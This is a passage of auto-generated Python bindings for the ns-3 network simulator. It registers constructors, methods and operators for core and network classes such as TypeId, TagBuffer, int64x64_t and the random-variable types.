cls.add_constructor([param('ns3::SystemWallClockMs const &', 'arg0')])
## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs::SystemWallClockMs() [constructor]
cls.add_constructor([])
## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::End() [member function]
cls.add_method('End',
'int64_t',
[])
## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedReal() const [member function]
cls.add_method('GetElapsedReal',
'int64_t',
[],
is_const=True)
## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedSystem() const [member function]
cls.add_method('GetElapsedSystem',
'int64_t',
[],
is_const=True)
## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedUser() const [member function]
cls.add_method('GetElapsedUser',
'int64_t',
[],
is_const=True)
## system-wall-clock-ms.h (module 'core'): void ns3::SystemWallClockMs::Start() [member function]
cls.add_method('Start',
'void',
[])
return
def register_Ns3Tag_methods(root_module, cls):
## tag.h (module 'network'): ns3::Tag::Tag() [constructor]
cls.add_constructor([])
## tag.h (module 'network'): ns3::Tag::Tag(ns3::Tag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Tag const &', 'arg0')])
## tag.h (module 'network'): void ns3::Tag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_virtual=True)
## tag.h (module 'network'): uint32_t ns3::Tag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): static ns3::TypeId ns3::Tag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## tag.h (module 'network'): void ns3::Tag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): void ns3::Tag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TagBuffer_methods(root_module, cls):
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')])
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor]
cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function]
cls.add_method('CopyFrom',
'void',
[param('ns3::TagBuffer', 'o')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function]
cls.add_method('ReadDouble',
'double',
[])
## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## tag-buffer.h (module 'network'): uint32_t ns3::TagBuffer::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function]
cls.add_method('TrimAtEnd',
'void',
[param('uint32_t', 'trim')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function]
cls.add_method('WriteDouble',
'void',
[param('double', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'v')])
return
def register_Ns3TriangularVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable(ns3::TriangularVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TriangularVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable(double s, double l, double mean) [constructor]
cls.add_constructor([param('double', 's'), param('double', 'l'), param('double', 'mean')])
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3UniformVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable(ns3::UniformVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UniformVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable(double s, double l) [constructor]
cls.add_constructor([param('double', 's'), param('double', 'l')])
## random-variable.h (module 'core'): uint32_t ns3::UniformVariable::GetInteger(uint32_t s, uint32_t l) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 's'), param('uint32_t', 'l')])
## random-variable.h (module 'core'): double ns3::UniformVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::UniformVariable::GetValue(double s, double l) [member function]
cls.add_method('GetValue',
'double',
[param('double', 's'), param('double', 'l')])
return
def register_Ns3WeibullVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(ns3::WeibullVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::WeibullVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m, double s) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m, double s, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's'), param('double', 'b')])
return
def register_Ns3ZetaVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable(ns3::ZetaVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ZetaVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable(double alpha) [constructor]
cls.add_constructor([param('double', 'alpha')])
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3ZipfVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable(ns3::ZipfVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ZipfVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable(long int N, double alpha) [constructor]
cls.add_constructor([param('long int', 'N'), param('double', 'alpha')])
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Int64x64_t_methods(root_module, cls):
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_unary_numeric_operator('-')
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor]
cls.add_constructor([])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor]
cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function]
cls.add_method('GetHigh',
'int64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function]
cls.add_method('GetLow',
'uint64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function]
cls.add_method('Invert',
'ns3::int64x64_t',
[param('uint64_t', 'v')],
is_static=True)
## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function]
cls.add_method('MulByInvert',
'void',
[param('ns3::int64x64_t const &', 'o')])
return
def register_Ns3Chunk_methods(root_module, cls):
## chunk.h (module 'network'): ns3::Chunk::Chunk() [constructor]
cls.add_constructor([])
## chunk.h (module 'network'): ns3::Chunk::Chunk(ns3::Chunk const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Chunk const &', 'arg0')])
## chunk.h (module 'network'): uint32_t ns3::Chunk::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## chunk.h (module 'network'): static ns3::TypeId ns3::Chunk::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## chunk.h (module 'network'): void ns3::Chunk::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3ConstantVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable(ns3::ConstantVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConstantVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable(double c) [constructor]
cls.add_constructor([param('double', 'c')])
## random-variable.h (module 'core'): void ns3::ConstantVariable::SetConstant(double c) [member function]
cls.add_method('SetConstant',
'void',
[param('double', 'c')])
return
def register_Ns3DeterministicVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::DeterministicVariable::DeterministicVariable(ns3::DeterministicVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeterministicVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::DeterministicVariable::DeterministicVariable(double * d, uint32_t c) [constructor]
cls.add_constructor([param('double *', 'd'), param('uint32_t', 'c')])
return
def register_Ns3EmpiricalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::EmpiricalVariable::EmpiricalVariable(ns3::EmpiricalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmpiricalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::EmpiricalVariable::EmpiricalVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): void ns3::EmpiricalVariable::CDF(double v, double c) [member function]
cls.add_method('CDF',
'void',
[param('double', 'v'), param('double', 'c')])
return
def register_Ns3ErlangVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable(ns3::ErlangVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ErlangVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable(unsigned int k, double lambda) [constructor]
cls.add_constructor([param('unsigned int', 'k'), param('double', 'lambda')])
## random-variable.h (module 'core'): double ns3::ErlangVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::ErlangVariable::GetValue(unsigned int k, double lambda) const [member function]
cls.add_method('GetValue',
'double',
[param('unsigned int', 'k'), param('double', 'lambda')],
is_const=True)
return
def register_Ns3ExponentialVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(ns3::ExponentialVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ExponentialVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
